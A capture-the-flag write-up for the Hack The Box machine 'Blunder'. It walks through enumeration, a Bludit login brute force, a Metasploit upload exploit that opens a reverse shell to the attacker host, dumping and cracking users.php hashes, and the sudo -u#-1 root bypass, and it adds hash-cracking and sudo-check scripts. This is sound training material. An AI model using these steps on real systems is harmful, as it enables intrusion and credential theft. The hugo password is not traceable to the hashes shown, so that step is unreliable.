Blunder
HTB Write-Up
Let's start with nmap:
root@liberty:/home/kali# nmap blunder.htb
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.019s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
root@liberty:/home/kali# nmap -sV blunder.htb
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.015s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@liberty:/home/kali#
Next is Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers:
root@liberty:/home/kali# nikto -h blunder.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.4.41
+ Target Hostname: blunder.htb
+ Target Port: 80
+ Start Time: 2020-10-13 13:32:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
Next we will enumerate some directories with Dirb - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
This allows us to quickly locate interesting directories such as admin portals:
We also take a look at the site itself. It has a lot of text on it, so this is a perfect time for CeWL, which builds a custom wordlist from the words found on a site.
root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@liberty:~# ls
Desktop Documents Downloads htb Music Pictures Public Templates Videos wordlist
root@liberty:~# cat wordlist
the
Load
Plugins
and
for
Include
Site
Page
has
About
King
with
USB
Begin
more
End
service
from
Stadia
Dynamic
...
After fuzzing with dirb, I came across this note in /to.txt:
-Inform fergus that the new blog needs images - PENDING
fergus looks like a username. A quick Google search also turned up this exploit, the Bludit brute-force protection bypass (CVE-2019-17240):
The exploit is a Ruby script with a couple of gem dependencies, so let's install them first.
root@liberty:~/htb# gem install httpclient
Fetching httpclient-2.8.3.gem
Successfully installed httpclient-2.8.3
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Done installing documentation for httpclient after 0 seconds
1 gem installed
root@liberty:~/htb# gem install docopt
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
1 gem installed
root@liberty:~/htb#
Let's give this exploit a try:
root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist
[*] Trying password: the
[*] Trying password: Load
[*] Trying password: Plugins
[*] Trying password: and
[*] Trying password: for
[*] Trying password: Include
[*] Trying password: Site
[*] Trying password: Page
[*] Trying password: has
[*] Trying password: About
[*] Trying password: King
[*] Trying password: with
[*] Trying password: USB
[*] Trying password: Begin
...
[+] Password found: RolandDeschain
With these credentials we now have access to the admin portal. After googling "bludit admin portal exploit" I came across this article:
Looks like there is also a Metasploit module, exploit/linux/http/bludit_upload_images_exec (CVE-2019-16113), which uploads a PHP payload named like an image together with a .htaccess that makes Apache execute it:
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.45:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ZTJkGHVYBh.png...
[*] Uploading .htaccess...
[*] Executing ZTJkGHVYBh.png...
[*] Sending stage (38288 bytes) to 10.129.4.41
[*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 4834 created.
Channel 1 created.
whoami
www-data
Let's stabilize this shell by spawning a proper PTY:
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
Let's begin our enumeration, both manual and automated. For the automated part we serve linenum.sh from our box and fetch it from the target:
root@liberty:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.4.41 - - [TBD] "GET /linenum.sh HTTP/1.1" 200
Grepping the application's files for strings such as auth, password and key, we come across this result in bl-content/databases/users.php:
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$
Let's use hash-identifier to see what we are dealing with here:
root@liberty:~/htb# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: bfcc887f62e36ea019e3295aafb8a3885966e265
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
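Before reaching for an online lookup it is worth knowing how Bludit actually stores these hashes. Bludit 3.x computes sha1(password . salt) in generatePasswordHash(), so a plain SHA-1 lookup only hits when a hash was produced without its salt. The following is an added example (my own code, not part of this write-up or of Bludit) that parses a users.php file, strips the PHP guard line, and tries every wordlist candidate in both the salted and the unsalted form. The users.php content and wordlist in it are constructed sample data, not the box's real entries.

```python
#!/usr/bin/env python3
"""Added example: offline check of Bludit users.php hashes.
Bludit 3.x stores sha1($password . $salt) (generatePasswordHash), so this
tries the salted form first and falls back to a bare sha1(password)."""
import hashlib
import json
from typing import Dict, Iterable, Optional, Tuple


def parse_users_php(text: str) -> Dict[str, dict]:
    """Drop the '<?php defined(...) ?>' guard Bludit prepends, then parse JSON."""
    body = text.split("?>", 1)[1] if "?>" in text else text
    return json.loads(body)


def bludit_hash(password: str, salt: str) -> str:
    """Bludit's scheme: SHA-1 over password followed by salt."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def crack_user(entry: dict, wordlist: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Return (password, scheme) with scheme 'salted' or 'unsalted', else None."""
    target = entry["password"].lower()
    salt = entry.get("salt", "")
    for pw in wordlist:
        if bludit_hash(pw, salt) == target:
            return pw, "salted"
        if hashlib.sha1(pw.encode()).hexdigest() == target:
            return pw, "unsalted"  # stored without its salt: online lookups work
    return None


def crack_all(users_php: str, wordlist: Iterable[str]) -> Dict[str, Optional[Tuple[str, str]]]:
    words = list(wordlist)
    return {name: crack_user(entry, words) for name, entry in parse_users_php(users_php).items()}


# Constructed sample data (not the box's real users.php): alice is hashed the
# way Bludit does it, bob's hash was generated without the salt.
SAMPLE_USERS_PHP = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps({
    "alice": {"role": "admin", "salt": "5dde2887e7aca",
              "password": bludit_hash("RolandDeschain", "5dde2887e7aca")},
    "bob": {"role": "author", "salt": "jqxpjfnv",
            "password": hashlib.sha1(b"Password120").hexdigest()},
}, indent=2)
SAMPLE_WORDLIST = ["the", "Load", "Plugins", "Password120", "RolandDeschain"]

if __name__ == "__main__":
    for user, hit in crack_all(SAMPLE_USERS_PHP, SAMPLE_WORDLIST).items():
        print(f"{user}: {hit}")
```

Feed it the real users.php and the CeWL wordlist from earlier; a hit reported as "unsalted" is exactly the case an online SHA-1 database can also resolve, while a "salted" hit would never show up there.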
hash-identifier points at SHA-1, and a short password hashed with SHA-1 is a quick online lookup away. Note the salt field next to each entry: Bludit normally stores sha1(password + salt), so a bare SHA-1 lookup only succeeds when the hash was generated without the salt. With the password recovered (Password120), let's try it against the local user hugo:
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo
Password: Password120
Let's grab the user flag now that we have a real user account instead of the www-data web shell.
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
FLAG HERE
We can check our sudo permissions using sudo -l:
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$
After some googling we come across this exploit, CVE-2019-14287:
They don't come any easier than this. The rule (ALL, !root) lets hugo run /bin/bash as any user except root, but sudo versions before 1.8.28 mishandle a numeric user ID of -1 (or 4294967295): the runas check does not match it against root, while the kernel treats it as uid 0. Privilege escalation is therefore a single command: sudo -u#-1 /bin/bash
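Both preconditions are visible from unprivileged output, so they can be checked before trying anything. Here is an added example (my own code, not from this write-up) that parses `sudo -l` output for a runas list containing ALL but excluding root, parses `sudo -V` for a version older than 1.8.28, and combines the two. The sudo -l text is the one shown above; the sudo -V line is a constructed assumption, since the page does not show the box's sudo version.

```python
#!/usr/bin/env python3
"""Added example: decide from 'sudo -l' and 'sudo -V' output whether the
-u#-1 bypass (CVE-2019-14287, fixed in sudo 1.8.28) applies to this user."""
import re
from typing import List, Optional, Tuple

# "(runas_users[:groups]) [TAG:] command" as printed by sudo -l
RUNAS_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:[A-Z]+:\s*)*(.+)$")
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(sudo_v: str) -> Optional[Tuple[int, int, int, int]]:
    """(major, minor, patch, p-level) from the first line of 'sudo -V'."""
    m = VERSION_RE.search(sudo_v)
    if not m:
        return None
    return tuple(int(x or 0) for x in m.groups())  # type: ignore[return-value]


def version_affected(v: Tuple[int, int, int, int]) -> bool:
    """CVE-2019-14287 affects every release before 1.8.28."""
    return v[:3] < (1, 8, 28)


def bypass_rules(sudo_l: str) -> List[str]:
    """Commands whose runas user list grants ALL while only excluding root."""
    hits = []
    for line in sudo_l.splitlines():
        m = RUNAS_RE.match(line)
        if not m:
            continue
        runas = [part.strip() for part in m.group(1).split(",")]
        users = [part.split(":")[0].strip() for part in runas]  # drop ':group' parts
        if "ALL" in users and "!root" in users:
            hits.append(m.group(2).strip())
    return hits


def assess(sudo_l: str, sudo_v: str) -> Tuple[bool, List[str]]:
    """True plus the exploitable commands when both preconditions hold."""
    v = parse_sudo_version(sudo_v)
    rules = bypass_rules(sudo_l)
    return (v is not None and version_affected(v) and bool(rules)), rules


# sudo -l output as seen on the box above.
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
# Constructed assumption: the page does not show the box's actual sudo version.
SAMPLE_SUDO_V = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"

if __name__ == "__main__":
    vulnerable, cmds = assess(SAMPLE_SUDO_L, SAMPLE_SUDO_V)
    print("affected:", vulnerable)
    for cmd in cmds:
        print(f"  try: sudo -u#-1 {cmd}")
```

On a live host, pipe the real output in (`sudo -l` and `sudo -V`) rather than the samples; a version of 1.8.28 or newer, or a rule with an explicit user list instead of ALL, means the trick will not work and a different path is needed.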
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
FLAG HERE
root@blunder:/home/hugo#